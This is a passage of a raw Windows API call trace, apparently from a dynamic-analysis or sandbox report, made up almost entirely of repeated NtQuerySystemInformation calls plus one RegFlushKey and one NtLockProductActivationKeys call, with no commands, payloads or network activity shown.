ResultLength=0x0) [0209.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f310, Length=0x30, ResultLength=0x0) [0209.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1d0, Length=0x18, ResultLength=0x0) [0209.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.578] RegFlushKey (hKey=0x338) returned 0x0 [0209.589] NtLockProductActivationKeys (pPrivateVer=0x0, pSafeMode=0x0) returned 0x0 [0209.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3e0, Length=0x38, ResultLength=0x0) [0209.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3e0, Length=0x38, ResultLength=0x0) [0209.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3e0, Length=0x38, ResultLength=0x0) [0209.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f320, Length=0x30, ResultLength=0x0) [0209.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f280, Length=0x20, ResultLength=0x0) [0209.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f320, Length=0x30, ResultLength=0x0) [0209.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f260, Length=0x30, ResultLength=0x0) [0209.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f650, Length=0x28, ResultLength=0x0) [0209.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f650, Length=0x28, ResultLength=0x0) [0209.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f530, Length=0x58, ResultLength=0x0) [0209.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f420, Length=0x38, ResultLength=0x0) [0209.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f260, Length=0x28, ResultLength=0x0) [0209.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f260, Length=0x28, ResultLength=0x0) [0209.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f260, Length=0x28, ResultLength=0x0) [0209.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f260, Length=0x28, ResultLength=0x0) [0209.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2d0, Length=0x28, ResultLength=0x0) [0209.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f420, Length=0x38, ResultLength=0x0) [0209.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f420, Length=0x38, ResultLength=0x0) [0209.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f350, Length=0x28, ResultLength=0x0) [0209.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f350, Length=0x28, ResultLength=0x0) [0209.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f420, Length=0x38, ResultLength=0x0) [0209.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f420, Length=0x38, ResultLength=0x0) [0209.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1c0, Length=0x20, ResultLength=0x0) [0209.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f140, Length=0x20, ResultLength=0x0) [0209.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f140, Length=0x20, ResultLength=0x0) [0209.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f140, Length=0x20, ResultLength=0x0) [0209.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f390, Length=0x20, ResultLength=0x0) [0209.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f420, Length=0x38, ResultLength=0x0) [0209.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2b0, Length=0x20, ResultLength=0x0) [0209.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f230, Length=0x20, ResultLength=0x0) [0209.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f230, Length=0x20, ResultLength=0x0) [0209.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f230, Length=0x20, ResultLength=0x0) [0209.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f420, Length=0x38, ResultLength=0x0) [0209.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2b0, Length=0x20, ResultLength=0x0) [0209.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f230, Length=0x20, ResultLength=0x0) [0209.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f230, Length=0x20, ResultLength=0x0) [0209.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f230, Length=0x20, ResultLength=0x0) [0209.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f420, Length=0x38, ResultLength=0x0) [0209.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2b0, Length=0x20, ResultLength=0x0) [0209.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f240, Length=0x20, ResultLength=0x0) [0209.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f240, Length=0x20, ResultLength=0x0) [0209.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f460, Length=0x40, ResultLength=0x0) [0209.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f380, Length=0x38, ResultLength=0x0) [0209.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f380, Length=0x38, ResultLength=0x0) [0209.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f380, Length=0x38, ResultLength=0x0) [0209.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f380, Length=0x38, ResultLength=0x0) [0209.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f380, Length=0x38, ResultLength=0x0) [0209.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 